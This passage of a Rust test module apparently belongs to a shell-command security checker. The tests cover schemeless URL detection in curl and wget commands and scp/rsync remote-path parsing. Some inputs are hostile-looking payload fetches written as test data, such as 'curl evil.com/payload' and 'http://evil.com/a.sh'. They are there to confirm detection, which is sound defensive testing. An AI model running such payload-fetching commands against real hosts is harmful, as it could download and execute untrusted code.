1953        assert!(
1954            schemeless.is_empty(),
1955            "lenna.png should not be detected as schemeless URL"
1956        );
1957    }
1958
1959    #[test]
1960    fn test_schemeless_skip_curl_output_combined() {
1961        let urls = extract_urls("curl -olenna.png https://example.com", ShellType::Posix);
1962        let schemeless: Vec<_> = urls
1963            .iter()
1964            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1965            .collect();
1966        assert!(
1967            schemeless.is_empty(),
1968            "-olenna.png should not be detected as schemeless URL"
1969        );
1970    }
1971
1972    #[test]
1973    fn test_schemeless_skip_wget_output_flag() {
1974        let urls = extract_urls("wget -O output.html https://example.com", ShellType::Posix);
1975        let schemeless: Vec<_> = urls
1976            .iter()
1977            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1978            .collect();
1979        assert!(
1980            schemeless.is_empty(),
1981            "output.html should not be detected as schemeless URL"
1982        );
1983    }
1984
1985    #[test]
1986    fn test_schemeless_skip_wget_combined() {
1987        let urls = extract_urls("wget -Ooutput.html https://example.com", ShellType::Posix);
1988        let schemeless: Vec<_> = urls
1989            .iter()
1990            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1991            .collect();
1992        assert!(
1993            schemeless.is_empty(),
1994            "-Ooutput.html should not be detected as schemeless URL"
1995        );
1996    }
1997
1998    #[test]
1999    fn test_schemeless_real_domain_still_detected() {
2000        let urls = extract_urls("curl evil.com/payload", ShellType::Posix);
2001        let schemeless: Vec<_> = urls
2002            .iter()
2003            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
2004            .collect();
2005        assert!(
2006            !schemeless.is_empty(),
2007            "evil.com/payload should be detected as schemeless URL"
2008        );
2009    }
2010
2011    #[test]
2012    fn test_schemeless_user_at_host_detected_in_sink_context() {
2013        let urls = extract_urls("curl user@bit.ly", ShellType::Posix);
2014        let schemeless: Vec<_> = urls
2015            .iter()
2016            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
2017            .collect();
2018        assert_eq!(schemeless.len(), 1);
2019        assert_eq!(schemeless[0].raw, "user@bit.ly");
2020    }
2021
2022    #[test]
2023    fn test_scp_user_at_host_not_treated_as_schemeless_url() {
2024        let urls = extract_urls("scp user@server.com file.txt", ShellType::Posix);
2025        let schemeless: Vec<_> = urls
2026            .iter()
2027            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
2028            .collect();
2029        assert!(schemeless.is_empty());
2030    }
2031
2032    fn scp_has_schemeless(cmd: &str, shell: ShellType) -> bool {
2033        extract_urls(cmd, shell)
2034            .iter()
2035            .any(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
2036    }
2037
2038    #[test]
2039    fn test_scp_plain_host_path_not_schemeless() {
2040        // The reporter's exact command shape.
2041        assert!(!scp_has_schemeless(
2042            "scp test.asdf testhost:/home/user/",
2043            ShellType::Posix
2044        ));
2045    }
2046
2047    #[test]
2048    fn test_scp_plain_host_relative_path_not_schemeless() {
2049        assert!(!scp_has_schemeless(
2050            "scp file.txt host:dir/",
2051            ShellType::Posix
2052        ));
2053    }
2054
2055    #[test]
2056    fn test_rsync_plain_host_path_not_schemeless() {
2057        assert!(!scp_has_schemeless(
2058            "rsync -av src host:/dest/",
2059            ShellType::Posix
2060        ));
2061    }
2062
2063    #[test]
2064    fn test_scp_one_letter_alias_posix_accepted() {
2065        // `x:/tmp/` on POSIX is a legitimate single-letter SSH alias.
2066        // The drive-letter guard must NOT reject this.
2067        assert!(!scp_has_schemeless("scp file x:/tmp/", ShellType::Posix));
2068    }
2069
2070    #[test]
2071    fn test_scp_windows_backslash_always_rejected() {
2072        // `C:\...` is never an scp remote — any shell.
2073        assert!(parse_scp_remote_spec("C:\\Users\\me\\file", ShellType::Posix).is_none());
2074        assert!(parse_scp_remote_spec("C:\\Users\\me\\file", ShellType::PowerShell).is_none());
2075        assert!(parse_scp_remote_spec("C:\\Users\\me\\file", ShellType::Cmd).is_none());
2076        assert!(parse_scp_remote_spec("D:\\backup", ShellType::Posix).is_none());
2077    }
2078
2079    #[test]
2080    fn test_scp_windows_forward_slash_shell_scoped() {
2081        // `C:/Users/me/file` is a drive path on PowerShell/Cmd, but on POSIX
2082        // it collides with the legitimate one-letter alias form — accept there.
2083        assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::PowerShell).is_none());
2084        assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::Cmd).is_none());
2085        assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::Posix).is_some());
2086        assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::Fish).is_some());
2087    }
2088
2089    #[test]
2090    fn test_scp_windows_ambiguous_drive_letter_accepted() {
2091        // `C:foo` is ambiguous with scp's `x:relative-path` alias form — accept
2092        // it in every shell to preserve back-compat; narrow guards beat blanket
2093        // bans here.
2094        for shell in [
2095            ShellType::Posix,
2096            ShellType::Fish,
2097            ShellType::PowerShell,
2098            ShellType::Cmd,
2099        ] {
2100            assert!(
2101                parse_scp_remote_spec("C:foo", shell).is_some(),
2102                "C:foo should parse as remote in shell {shell:?}"
2103            );
2104            assert!(
2105                parse_scp_remote_spec("D:backup/x.txt", shell).is_some(),
2106                "D:backup/x.txt should parse as remote in shell {shell:?}"
2107            );
2108        }
2109    }
2110
2111    #[test]
2112    fn test_scp_rejects_url_scheme() {
2113        assert!(parse_scp_remote_spec("http://evil.com/a.sh", ShellType::Posix).is_none());
2114        assert!(parse_scp_remote_spec("https://a.b/c", ShellType::Posix).is_none());
2115    }
2116
2117    #[test]
2118    fn test_scp_rejects_flag_and_absolute_local() {
2119        assert!(parse_scp_remote_spec("-P", ShellType::Posix).is_none());
2120        assert!(parse_scp_remote_spec("--port=22", ShellType::Posix).is_none());
2121        // `/tmp:weird` — `:` preceded by `/` means absolute local path.
2122        assert!(parse_scp_remote_spec("/tmp:weird", ShellType::Posix).is_none());
2123    }
2124
2125    #[test]
2126    fn test_scp_accepts_user_at_host_forms() {
2127        // Back-compat with the original covered shape.
2128        assert!(parse_scp_remote_spec("user@server.com:file.txt", ShellType::Posix).is_some());
2129        assert!(parse_scp_remote_spec("user@host:/path", ShellType::Posix).is_some());
2130    }
2131
2132    #[test]
2133    fn test_scp_rejects_missing_parts() {
2134        assert!(parse_scp_remote_spec("", ShellType::Posix).is_none());
2135        assert!(parse_scp_remote_spec(":path", ShellType::Posix).is_none()); // empty host
2136        assert!(parse_scp_remote_spec("@host:path", ShellType::Posix).is_none()); // empty user
2137        assert!(parse_scp_remote_spec("user@:path", ShellType::Posix).is_none());
2138        // empty host
2139    }
2140
2141    #[test]
2142    fn test_scp_rejects_host_with_slash() {
2143        // Host must not contain `/`.
2144        assert!(parse_scp_remote_spec("foo/bar:baz", ShellType::Posix).is_none());
2145    }
2146
2147    #[test]
2148    fn test_parse_scp_remote_spec_fields_populated() {
2149        // Exercise the parser's structured output so downstream consumers
2150        // of user/host/path can rely on the fields rather than just the
2151        // Option presence check.
2152        let spec = parse_scp_remote_spec("user@server.com:/path", ShellType::Posix).unwrap();
2153        assert_eq!(spec.user.as_deref(), Some("user"));
2154        assert_eq!(spec.host, "server.com");
2155        assert_eq!(spec.path, "/path");
2156
2157        let spec = parse_scp_remote_spec("host:/dest/", ShellType::Posix).unwrap();
2158        assert_eq!(spec.user, None);
2159        assert_eq!(spec.host, "host");
2160        assert_eq!(spec.path, "/dest/");
2161    }
2162
2163    #[test]
2164    fn test_schemeless_png_no_slash_is_file() {
2165        assert!(!looks_like_schemeless_host("lenna.png"));
2166    }
2167
2168    #[test]
2169    fn test_schemeless_tld_overlap_with_path_is_domain() {
2170        // evil.zip/payload has a path component, so the .zip extension heuristic
2171        // should NOT suppress it — evil.zip is a real TLD and this is a domain.
2172        assert!(looks_like_schemeless_host("evil.zip/payload"));
2173        assert!(looks_like_schemeless_host("evil.sh/payload"));
2174    }
2175
2176    #[test]
2177    fn test_schemeless_tld_overlap_without_path_is_file() {
2178        // Without a path, lenna.zip / script.sh look like filenames, not domains.
2179        assert!(!looks_like_schemeless_host("lenna.zip"));
2180        assert!(!looks_like_schemeless_host("script.sh"));
2181    }
2182
2183    #[test]
2184    fn test_schemeless_tld_overlap_sink_context_detected() {
2185        // In a real sink context, evil.zip/payload should be detected as schemeless URL.
2186        let urls = extract_urls("curl evil.zip/payload", ShellType::Posix);
2187        let schemeless: Vec<_> = urls
2188            .iter()
2189            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
2190            .collect();
2191        assert!(
2192            !schemeless.is_empty(),
2193            "evil.zip/payload should be detected as schemeless URL in sink context"
2194        );
2195    }
2196}